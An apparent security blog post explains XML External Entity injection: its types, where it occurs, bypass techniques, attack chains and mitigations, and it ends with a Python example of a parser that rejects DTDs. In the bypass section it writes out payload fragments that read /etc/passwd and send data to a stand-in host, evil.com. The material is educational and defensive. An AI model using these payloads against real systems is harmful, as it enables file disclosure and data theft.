XML External Entity Injection (XXE)


What is XXE? What are the different types of XXE? In which areas of an application can XXE be found? Which bypasses exist? Which vulnerability chains build on XXE? What are its impact and mitigation?
Definition
XXE is a vulnerability that allows an attacker to interfere with an application's processing of XML data by injecting a malicious external entity.
Types of XXE
In-band XXE: the attacker sends the attack and receives the response over the same channel. Example: a direct HTTP request and its response.
Out-of-band XXE: the attacker sends the attack and receives the response through a different resource under the attacker's control. Example: the attacker sends a direct request that makes the web server send a sensitive file to the attacker's own web server.
Blind XXE: the attacker sends a direct request but gets no direct response. Instead they observe the behaviour of the vulnerable web application to determine whether the attack succeeded. Example: by watching the error messages.
Different areas of the web application where XXE can be found
File upload: an application that lets users upload files, especially when it accepts XML files, can be vulnerable to XXE.
API endpoints: many web applications use an API for communication and transfer data as XML. If the input is not properly sanitized, the endpoint is vulnerable to XXE.
Form data: if the application has a form that accepts XML input, it can be vulnerable to XXE.
PDF generator: if the application has a PDF download feature, change the Content-Type to XML and submit the malicious XXE payload.
Third-party libraries: if an application uses a third-party library for data communication and that library accepts XML input, it can be vulnerable to XXE.
Bypasses for XXE
Character encoding: encode every character of the payload (Base64, Unicode, octal, hex).
Parameter entities: instead of a general external entity, the attacker uses a parameter entity to reference external entities indirectly. Example: <!ENTITY % file SYSTEM "file:///etc/passwd">
Custom protocols: the attacker uses a protocol such as ftp, http, file or gopher to reference the external entity.
Out-of-band interaction: the attacker injects entities that reference an external server under attacker control. Example: <!ENTITY xxe SYSTEM "http://evil.com/steal?data=
Chaining with XXE
File disclosure: the attacker injects the malicious payload and reads data from sensitive files such as /etc/passwd, configuration files and .env files.
Server-side request forgery: the attacker injects the malicious payload and makes the server request internal resources (metadata endpoints, admin panels, port scanning).
Command injection / remote code execution: some XML parsers allow custom protocol wrappers such as php://, jar:// or expect://, which can be used to load a malicious script.
Exfiltration: if the attacker places a reverse-shell payload in the application, the response is sent to the attacker-controlled server.
Impact
Sensitive data exposure: access to sensitive files on the server file system, including extraction of configuration files and credentials.
Denial of service: the attacker sends multiple requests, resulting in resource exhaustion and network bandwidth depletion.
Mitigation
Disable DTDs and external entity processing.
Whitelist schema and namespace sources.
Use a secure, hardened XML parser.
Apply proper input validation and boundary checks.
Check for unusual HTTP traffic (out-of-band interaction).
Instead of XML, use JSON, which is less vulnerable.
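As an added example, not from the original post, the first and third mitigations in Python using only the standard library's expat bindings: the parser refuses any DOCTYPE, entity declaration or external entity reference before it is processed. The sample documents are constructed; the UTF-16 sample shows why the control belongs in the parser rather than in a byte-level keyword filter, which the encoding bypass above would evade.

```python
import xml.parsers.expat as expat


class XmlRejected(ValueError):
    """Raised when untrusted XML uses a forbidden feature (fail closed)."""


def parse_untrusted(data: bytes) -> dict:
    """Parse untrusted XML with DTD/entity handling disabled at the parser
    level; returns a flat {tag: text} mapping of leaf elements."""
    parser = expat.ParserCreate()
    result, buf = {}, []

    def reject(what):
        def handler(*_args):
            raise XmlRejected(f"{what} is not allowed in untrusted XML")
        return handler

    # Refuse every DTD construct: the DOCTYPE itself (which covers the
    # internal subset), entity declarations, and external/parameter entities.
    parser.StartDoctypeDeclHandler = reject("DOCTYPE declaration")
    parser.EntityDeclHandler = reject("ENTITY declaration")
    parser.ExternalEntityRefHandler = reject("external entity reference")
    parser.SetParamEntityParsing(expat.XML_PARAM_ENTITY_PARSING_NEVER)

    def end(name):
        text = "".join(buf).strip()
        if text:
            result[name] = text
        buf.clear()

    parser.StartElementHandler = lambda _name, _attrs: buf.clear()
    parser.EndElementHandler = end
    parser.CharacterDataHandler = buf.append
    parser.Parse(data, True)  # raises XmlRejected or expat.ExpatError
    return result


def rejects(data: bytes) -> bool:
    """True if parse_untrusted refuses the document under the policy."""
    try:
        parse_untrusted(data)
    except XmlRejected:
        return True
    return False


# Constructed sample inputs (not taken from any real application).
BENIGN_XML = b"<order><item>book</item><qty>2</qty></order>"
DTD_XML = (b"<!DOCTYPE d [<!ENTITY x SYSTEM 'file:///placeholder'>]>"
           b"<order>&x;</order>")
# Same DTD as UTF-16: a byte-level "<!DOCTYPE" filter misses it, the parser does not.
ENCODED_DTD_XML = DTD_XML.decode("ascii").encode("utf-16")
```

Malformed input still raises expat.ExpatError, so callers should treat that as a rejection as well.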
Written by Sanket Narawade